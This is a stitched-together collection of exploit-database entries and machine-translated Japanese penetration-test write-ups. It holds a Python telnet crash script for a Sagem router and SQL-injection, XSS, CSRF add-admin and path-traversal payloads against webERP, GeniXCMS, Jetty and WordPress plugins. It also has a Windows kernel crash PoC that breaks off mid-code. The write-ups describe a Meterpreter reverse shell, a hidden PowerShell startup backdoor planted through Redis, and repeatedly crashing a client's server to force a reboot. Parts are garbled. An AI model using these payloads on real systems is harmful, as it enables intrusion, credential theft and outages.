HireHackking

0x00はじめに このテストは実用的なテストです。テスト環境は、認定プロジェクトの一部です。機密情報コンテンツはコーディングされており、議論と学習のみです。私はイントラネットの初心者でもあるため、使用したMSF攻撃技術のいくつかも非常に基本的です。アドバイスをください。 0x01 get shell ゲッシェルプロセスについては何も言うことはありません。これは、単純な背景の弱いパスワードのアップロードに過ぎず、Ice ScorpionはGetShellに接続します。 シェルを取得した後、シミュレートされた端子ping 8.8.8.8にはリターンパッケージがあり、サーバーが外部ネットワークと相互接続されていることを示します。 外部ネットワークに接続されているため、Ice Scorpionリバウンドシェルを使用してMSFのExploit/Multi/Handlerを使用してセッションを取得することを試みることができます Exploit/Multi/Handlerを使用します ペイロードWindows/x64/meterpreter/reverse_tcpを設定します lhost xxx.xxx.xxx.xxxx.

source: https://www.securityfocus.com/bid/50689/info Webistry is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Webistry 1.0 is vulnerable; other versions may also be affected. http://www.example.com /index.php?pid=14 union select 0,1,2,3,version(),5,6,7

# Title : Sagem F@st 3304-V2 Telnet Crash POC # Vendor : http://www.sagemcom.com # Severity : High # Tested Router : Sagem F@st 3304-V2 (3304-V1, other versions may also be affected) # Date : 2015-03-08 # Author : Loudiyi Mohamed # Contact : Loudiyi.2010@gmail.com # Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603 # Vulnerability description: #========================== #A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string. #This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000. #After the exploit is sent, the telnet service will crash and the router will reboot automatically. #Usage: python SagemDos.py "IP address" # Code #======================================================================== #!/usr/bin/python import socket import sys print("######################################") print("# DOS Sagem F@st3304 v1-v2 #") print("# ---------- #") print("# BY LOUDIYI MOHAMED #") print("#####################################") if (len(sys.argv)<2): print "Usage: %s <host> " % sys.argv[0] print "Example: %s 192.168.1.1 " % sys.argv[0] exit(0) print "\nSending evil buffer..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((sys.argv[1], 23)) buffer = "X"*500000 s.send(buffer) except: print "Could not connect to Sagem Telnet!" #========================================================================

Sources: http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html https://code.google.com/p/google-security-research/issues/detail?id=284 Full PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36311.tar.gz This is a proof-of-concept exploit that is able to escape from Native Client's x86-64 sandbox on machines that are susceptible to the DRAM "rowhammer" problem. It works by inducing a bit flip in read-only code so that the code is no longer safe, producing instruction sequences that wouldn't pass NaCl's x86-64 validator. Note that this uses the CLFLUSH instruction, so it doesn't work in newer versions of NaCl where this instruction is disallowed by the validator. There are two ways to test the exploit program without getting a real rowhammer-induced bit flip: * Unit testing: rowhammer_escape_test.c can be compiled and run as a Linux executable (instead of as a NaCl executable). In this case, it tests each possible bit flip in its code template, checking that each is handled correctly. * Testing inside NaCl: The patch "inject_bit_flip_for_testing.patch" modifies NaCl's dyncode_create() syscall to inject a bit flip for testing purposes. This syscall is NaCl's interface for loading code dynamically. Mark Seaborn mseaborn@chromium.org March 2015

Sources: http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html https://code.google.com/p/google-security-research/issues/detail?id=283 Full PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36310.tar.gz This is a proof-of-concept exploit that is able to gain kernel privileges on machines that are susceptible to the DRAM "rowhammer" problem. It runs as an unprivileged userland process on x86-64 Linux. It works by inducing bit flips in page table entries (PTEs). For development purposes, the exploit program has a test mode in which it induces a bit flip by writing to /dev/mem. qemu_runner.py will run the exploit program in test mode in a QEMU VM. It assumes that "bzImage" (in the current directory) is a Linux kernel image that was built with /dev/mem enabled (specifically, with the the CONFIG_STRICT_DEVMEM option disabled). Mark Seaborn mseaborn@chromium.org March 2015

source: https://www.securityfocus.com/bid/50713/info webERP is prone to information-disclosure, SQL-injection, and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may exploit the information-disclosure issue to gain access to sensitive information that may lead to further attacks. An attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. webERP 4.0.5 is vulnerable; prior versions may also be affected. http://www.example.com/doc/manual/manualcontents.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/AccountGroups.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/AccountSections.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/AddCustomerContacts.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3C/html%3E http://www.example.com/AddCustomerNotes.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3C/html%3E http://www.example.com/Areas.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/AddCustomerTypeNotes.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/AgedDebtors.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/AgedSuppliers.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/50713/info webERP is prone to information-disclosure, SQL-injection, and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may exploit the information-disclosure issue to gain access to sensitive information that may lead to further attacks. An attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. webERP 4.0.5 is vulnerable; prior versions may also be affected. http://www.example.com/reportwriter/ReportMaker.php?action=go&reportid=SQL_CODE_HERE

source: https://www.securityfocus.com/bid/50713/info webERP is prone to information-disclosure, SQL-injection, and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may exploit the information-disclosure issue to gain access to sensitive information that may lead to further attacks. An attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. webERP 4.0.5 is vulnerable; prior versions may also be affected. <form action="http://www.example.com/reportwriter/FormMaker.php" method="post"> <input type="hidden" name="ReportID" value="1 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20"> <input type="hidden" name="FormID" value="[FormID]" /> <input type="hidden" name="todo" value="Criteria Setup" /> <input type="submit" value="submit" id="btn"> </form>

source: https://www.securityfocus.com/bid/50719/info Flexible Custom Post Type plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/[path]/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=[xss]

source: https://www.securityfocus.com/bid/50717/info ZOHO ManageEngine ADSelfService Plus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. ManageEngine ADSelfService Plus 4.5 Build 4521 is vulnerable; other versions may also be affected. Proof of Concept =================== Double-Quote String Termination HTTP Request = https://serverip:port/EmployeeSearch.cc?searchType=contains&searchBy=ALL_FIELDS&searchString=";alert("XSS");//\" Response Source View <script language="javascript"> var searchValue = "';alert(XSS)//\""; Single-Quote String Termination Similarly... HTTP Request https://serverip:port/EmployeeSearch.cc?searchType=';document.location="http://www.cnn.com";//\"&searchBy=ALL_FIELDS&searchString=BoB

source: https://www.securityfocus.com/bid/50723/info Jetty Web Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks. http://www.example.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key

source: https://www.securityfocus.com/bid/50729/info GoAhead WebServer is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. GoAhead WebServer 2.5 is vulnerable; other versions may also be affected. http://www.example.com/goform/formTest?name=%3Cscript%3Ealert(4321)%3C/script%3E&address=%3Cscript%3Ealert(1234)%3C/script%3E

# Exploit Title: Codoforum 2.5.1 Arbitrary File Download # Date: 23-11-2014 # Software Link: https://codoforum.com/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps # CVE: CVE-2014-9261 1. Description str_replace() is used to sanitize file path but function output is not assigned to variable private function sanitize($name) { str_replace("..", "", $name); str_replace("%2e%2e", "", $name); return $name; } http://security.szurek.pl/codoforum-251-arbitrary-file-download.html 2. Proof of Concept http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php or http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php 3. Solution: Use patch: https://codoforum.com/upgrades/codoforum.v.2.6.up.zip

source: https://www.securityfocus.com/bid/50735/info Digital Attic Foundation CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/index.php?id=[SQL]

 GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploit Vendor: MetalGenix Product web page: http://www.genixcms.org Affected version: 0.0.1 Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF). It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to Advanced Developer. Some manual configurations are needed to make this application to work. Desc: Input passed via the 'page' GET parameter and the 'username' POST parameter is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Tested on: nginx/1.4.6 (Ubuntu) Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5232 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5232.php 05.03.2015 --- Get admin user/pass hash: ------------------------- http://localhost/genixcms/index.php?page=1' union all select 1,2,(select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ,4,5,6,7,8,9,10 and 'j'='j Read file (C:\windows\win.ini) and MySQL version: ------------------------------------------------- http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x433a5c77696e646f77735c77696e2e696e69),4,@@version,6,7,8,9,10 and 'j'='j Read file (/etc/passwd) and MySQL version: ------------------------------------------ http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x2f6574632f706173737764),4,@@version,6,7,8,9,10 and 'j'='j Get admin user/pass hash: ------------------------- POST /genixcms/gxadmin/login.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 335 Accept: */* User-Agent: ZSLScan_1.4 Connection: Close password=1&username=' and(select 1 from(select count(*),concat((select (select (select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1&login= ################################################################################################ GeniXCMS v0.0.1 Persistent Script Insertion Vulnerability Vendor: MetalGenix Product web page: http://www.genixcms.org Affected version: 0.0.1 Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF). It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to Advanced Developer. Some manual configurations are needed to make this application to work. Desc: Input passed to the 'cat' POST parameter is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: nginx/1.4.6 (Ubuntu) Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5233 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5233.php 05.03.2015 --- Stored: ------- <html> <body> <form action="http://localhost/genixcms/gxadmin/index.php?page=categories" method="POST"> <input type="hidden" name="parent" value="2" /> <input type="hidden" name="cat" value='"><script>alert(document.cookie)</script>' /> <input type="hidden" name="addcat" value="" /> <input type="submit" value="Insert" /> </form> </body> </html> Reflected: ---------- http://localhost/genixcms/index.php?page=1<script>confirm("ZSL")</script>' ################################################################################################  GeniXCMS v0.0.1 CSRF Add Admin Exploit Vendor: MetalGenix Product web page: http://www.genixcms.org Affected version: 0.0.1 Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF). It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to Advanced Developer. Some manual configurations are needed to make this application to work. Desc: The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: nginx/1.4.6 (Ubuntu) Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5234 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5234.php 05.03.2015 --- <html> <body> <form action="http://localhost/genixcms/gxadmin/index.php?page=users" method="POST"> <input type="hidden" name="userid" value="Testingus" /> <input type="hidden" name="pass1" value="123456" /> <input type="hidden" name="pass2" value="123456" /> <input type="hidden" name="email" value="t00t@zeroscience.eu" /> <input type="hidden" name="group" value="0" /> <input type="hidden" name="adduser" value="" /> <input type="submit" value="Forge!" /> </form> </body> </html>

source: https://www.securityfocus.com/bid/50743/info Alert Before Your Post plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/[path]/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=[xss]

0x01はじめに このテストは実用的なテストです。テスト環境は、認定プロジェクトの一部です。機密情報コンテンツはコーディングされており、議論と学習のみです。テスト時に承認を取得してください。 承認されたプロジェクトを取得したとき、顧客は私に会社名を教えてくれただけで、ここで私は特定の会社に置き換えられました。 0x02情報収集 古い方法は、サブドメイン名をスキャンしてからディレクトリをスキャンすることです。私は混乱を見つけましたが、それを使用することに意味がありませんでした、そしてそれはクラウドホストでした。資産のさらなる検出であるOuliは、CVE-2019-0708の発見を与えました。 TargetRはWindows Server 2008 R2システムです。 0x03 getShell CVE-2019-0708を発見したと思いました。当時、私は大規模なヘルスケアMSFを取り出してカムバックしました。くそー、私はそれが使用できないことを発見し、私は脆弱性を検出しましたが、セッションの作成に失敗しました。 はあきらめたくなかったので、定着は役に立たなかった。 20回以上攻撃した後、同じ間違いがまだ同じであり、顧客のターゲットマシンを引き起こし、ブルースクリーンを20回以上追跡しました。 読み続けて、Redisアセットがあることがわかりました。弱いパスワードを試してみると、パスワードが123123であることがわかりました。最初に情報を確認しましょう。 ここで使用するのが困難です。つまり、ウェブサイトの実際の物理的パスはまったくわかりません。エラーを報告したり、物理的なパスを爆破しようとすることは実りがないため、文やその他のフォームを書いてもウェブシェルを取得することはできません。ここには、Linuxのようなリバウンドと利用はありません。書くべき計画されたタスクはありません。 以前の情報収集の後、Windows Server 2008 R2であることがわかりました。トロイの木馬を起動してスタートアップに入れるためのスクリプトを作成し、CVE-2019-0708を使用してホストを「強制」して再起動することができます。 それを行うには、ここでPowershellのCS馬を使用してください（ここでは殺されるべきではなく、ここでは議論されないことに注意してください）。まず、RedisのワーキングディレクトリをWindowsのスタートアップディレクトリに設定し、次にCS Horseを書きます。保存することを忘れないでください。そうしないと、常にメモリになります。 CVE-2019-0708を使用して、ホストを再起動するように「強制」します。あなたはそれが正常に起動されたことを見ることができます。 実際のテスト後、このスタートアップアイテムは国内のソフトウェアキラーを通過できますが、CMDを呼び出すと傍受されます。 0x03要約 1。情報収集により、ターゲットにはCVE-2019-0708の脆弱性があります。脆弱性ディスカバリーシステムのブルースクリーンが再起動しました2。 3.ターゲットシステムを入力するために弱いパスワードを介して123123を入力してみてください。しかし、ウェブサイトのルートディレクトリを知らず、スタートアップアイテムにバックドアを書き込むことができます。CS5でPSスクリプトバックドアを生成します。 '\ r \ n \ r \ npowershell.exe -nop -w hidden -c' saveinfo6。 CVE-2019-0708脆弱性ブルースクリーンを介して再起動し、CSオリジナルテキスト接続の起動に成功しました。 https://mp.weixin.qqc.com/s?__biz=mzg4ntuwmzm1ng==mid=22474895578IDX=1SN=9DC27C160BFB4FDCA0316CE18EE4CKKKCHKSM=CFA6BC3 9F8D1352F5B0FEB60E8029A68F8719CE8AC42A3D3475DB722A319DACFE92E97DA7607SCENE=178CUR_ALBUM_ID=1553386251775492092098＃RD

source: https://www.securityfocus.com/bid/50744/info Advanced Text Widget plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Advanced Text Widget 2.0.0 is vulnerable; other versions may also be affected. UPDATE Apr 18, 2012: Further reports indicate the issue reported may not be valid. This BID will be updated as more information emerges. http://www.example.com/[path]/wp-content/plugins/advanced-text-widget/advancedtext.php?page=[xss]

source: https://www.securityfocus.com/bid/50745/info Adminimize plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Adminimize 1.7.21 is vulnerable; other versions may also be affected. http://www.example.com/[path]/wp-content/plugins/adminimize/adminimize_page.php?page=[xss]

source: https://www.securityfocus.com/bid/50763/info Microsoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition. Crash: /* win7 Access violation - code c0000005 (!!! second chance !!!) win32k!ReadLayoutFile+0x62: 9566d591 8b4834 mov ecx,dword ptr [eax+34h] kd> r eax=ffffffe8 ebx=00000000 ecx=fe978b2e edx=000000e0 esi=fe4e0168 edi=00000000 eip=9566d591 esp=985ad8a0 ebp=985ad8bc iopl=0 nv up ei pl nz ac pe cy cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010217 win32k!ReadLayoutFile+0x62: 9566d591 8b4834 mov ecx,dword ptr [eax+34h] ds:0023:0000001c=???????? kd> kb ChildEBP RetAddr Args to Child 985acf5c 83d1b083 00000003 bc9827e2 00000065 nt!RtlpBreakWithStatusInstruction 985acfac 83d1bb81 00000003 985ad3b0 00000000 nt!KiBugCheckDebugBreak+0x1c 985ad370 83d1af20 0000008e c0000005 9566d591 nt!KeBugCheck2+0x68b 985ad394 83cf108c 0000008e c0000005 9566d591 nt!KeBugCheckEx+0x1e 985ad7bc 83c7add6 985ad7d8 00000000 985ad82c nt!KiDispatchException+0x1ac 985ad824 83c7ad8a 985ad8bc 9566d591 badb0d00 nt!CommonDispatchException+0x4a 985ad8bc 9566dc6a fe4e0168 80000984 00000160 nt!Kei386EoiHelper+0x192 985ad8dc 95669b7b 80000984 00000160 000001ae win32k!LoadKeyboardLayoutFile+0x70 985ad968 9567c21e 883bf4b0 80000984 08040804 win32k!xxxLoadKeyboardLayoutEx+0x1be 985ad9a4 9566a275 883bf4b0 80000984 08040804 win32k!xxxSafeLoadKeyboardLayoutEx+0x93 985add0c 83c7a1ea 00000038 00000160 000001ae win32k!NtUserLoadKeyboardLayoutEx+0x119 985add0c 777970b4 00000038 00000160 000001ae nt!KiFastCallEntry+0x12a 001ff470 0111c58c 0111c76a 00000038 00000160 ntdll!KiFastSystemCallRet WARNING: Stack unwind information not available. Following frames may be wrong. 001ff9f8 0111c956 00000000 00000000 7ffd9000 ms10_73+0x2c58c Details£º WIN7 .text:BF80D538 push eax ; int .text:BF80D539 push 40000h ; int .text:BF80D53E push 40h ; int .text:BF80D540 push [ebp+start_buffer] ; FileHandle .text:BF80D543 mov [ebp+plength], ebx .text:BF80D546 mov [ebp+ppbuffer], ebx .text:BF80D549 mov [ebp+var_10], ebx .text:BF80D54C call _LoadFileContent@20 ; LoadFileContent(x,x,x,x,x) .text:BF80D551 test eax, eax .text:BF80D553 jl loc_BF80D6F1 .text:BF80D559 mov ecx, [ebp+ppbuffer] ¹¹Ôì¶ÑµØÖ·+3ch´¦µÄdword =0xffffffxx ¼´¿ÉÈƹý¼ì²â£¬µ¼ÖÂBSOD .text:BF80D55C mov eax, [ecx+3Ch] //ÐèÒª²Â²â¶ÑµÄµØÖ· .text:BF80D55F add eax, ecx .text:BF80D561 cmp eax, ecx .text:BF80D563 jb loc_BF80D6F1 .text:BF80D569 mov ecx, [ebp+plength] .text:BF80D56C mov edx, [ebp+ppbuffer] .text:BF80D56F add ecx, edx .text:BF80D571 lea edx, [eax+0F8h] .text:BF80D577 mov [ebp+plength], ecx .text:BF80D57A cmp edx, ecx .text:BF80D57C jnb loc_BF80D6F1 .text:BF80D582 mov ecx, [eax+34h] ----->crash winxp .text:BF8821D7 push eax ; ViewSize .text:BF8821D8 push esi ; SectionOffset .text:BF8821D9 push esi ; CommitSize .text:BF8821DA push esi ; ZeroBits .text:BF8821DB lea eax, [ebp+BaseAddress] .text:BF8821DE push eax ; BaseAddress .text:BF8821DF push 0FFFFFFFFh ; ProcessHandle .text:BF8821E1 push [ebp+Handle] ; SectionHandle .text:BF8821E4 call ds:__imp__ZwMapViewOfSection@40 ; ZwMapViewOfSection(x,x,x,x,x,x,x,x,x,x) .text:BF8821EA test eax, eax .text:BF8821EC jl loc_BF88238A .text:BF8821F2 mov ecx, [ebp+BaseAddress] .text:BF8821F5 mov eax, [ecx+3Ch] .text:BF8821F8 add eax, ecx .text:BF8821FA movzx edx, word ptr [eax+6] -----¡µcrash // poc.cpp : ¶¨Òå¿ØÖÆ̨ӦÓóÌÐòµÄÈë¿Úµã¡£ // #include "stdafx.h" #include <windows.h> #include <stdio.h> #include <ntsecapi.h> #pragma comment(lib,"User32.lib") #define MAGIC_OFFSET 0x6261 #define WIN7 1 #define InitializeUnicodeStr(p,s) { \ (p)->Length= wcslen(s)*2; \ (p)->MaximumLength = wcslen(s)*2+2; \ (p)->Buffer = s; \ } #if WIN7 _declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx ( IN HANDLE Handle, IN DWORD offTablelow, IN DWORD offTableHigh, IN PUNICODE_STRING puszKeyboardName, IN HKL hKL, IN PUNICODE_STRING puszKLID, IN DWORD dwKLID, IN UINT Flags ) { __asm { mov eax,11E3h mov edx, 7ffe0300h call dword ptr [edx] ret 20h } } #else _declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx ( IN HANDLE Handle, IN DWORD offTable, IN PUNICODE_STRING puszKeyboardName, IN HKL hKL, IN PUNICODE_STRING puszKLID, IN DWORD dwKLID, IN UINT Flags ) { __asm { mov eax, 000011c6h mov edx, 7ffe0300h call dword ptr [edx] retn 1Ch } } #endif unsigned char fakeDll2[]="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x44\x01"//0x40 00 00 00 base=fdbbca98 fdbbca00 02443500 "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"// "\x00\x00\x00\x00\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x2E\x64\x61\x74\x61\x00\x00\x00" "\xE6\x00\x00\x00\x60\x01\x00\x00\xE6\x00\x00\x00\x60\x01\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\xFF\xFF\x00\x00\x9E\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"//crash?? 94 10 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\xA6\x01\x00\x00\xAA\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x9C\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x01\x00\x00\x00\xC2\x01\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"//index "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00"; ; UNICODE_STRING uStr; UNICODE_STRING uKerbordname; VOID boom_loadlayout() { KEYBDINPUT kb={0}; INPUT vInput={0}; HANDLE hFile; DWORD dwFuckS0ny; HKL hKbd; WCHAR lpPath[MAX_PATH]={0}; WCHAR lpLayoutFile[MAX_PATH]={L"C:\\Windows\\System32\\lSp0wns.boom111"}; LPVOID lpShellPtr; //strcpy( lpLayoutFile, L"%lSp0wns.boom111", lpPath); hFile = CreateFileW(lpLayoutFile, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS, 0,0); if( hFile == INVALID_HANDLE_VALUE ) { printf(" \n[!!] Error:errorcode:%x\n",GetLastError()); exit(0); } WriteFile( hFile, fakeDll2, sizeof(fakeDll2)-1, &dwFuckS0ny, NULL); //printf("\n[+] Writing malformed kbd layout file \n\t\"%S\"\n\t[ %d ] bytes written\n",lpLayoutFile,dwFuckS0ny); CloseHandle(hFile); hFile = CreateFileW (lpLayoutFile, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0,0); if( hFile == INVALID_HANDLE_VALUE ) { printf(" \n[!!] Error\n"); exit(0); } hKbd = GetKeyboardLayout( GetWindowThreadProcessId( GetForegroundWindow(), &dwFuckS0ny ) ); printf("\n[+] Loading it...[ 0x%x ]\n", NtUserLoadKeyboardLayoutEx( hFile, 0x0160,0x01AE,&uKerbordname, hKbd, &uStr, 0x666, 0x101 ) );// 0x101 /*HKL NTAPI NtUserLoadKeyboardLayoutEx ( IN HANDLE Handle, IN DWORD offTable, IN PUNICODE_STRING puszKeyboardName, IN HKL hKL, IN PUNICODE_STRING puszKLID, IN DWORD dwKLID, IN UINT Flags ) */ //win7ÏÂÃæÕâ¸öº¯ÊýÊǸö²ÎÊýÀ´ÆäÖÐoffTable²ð·Ö³É¸ö 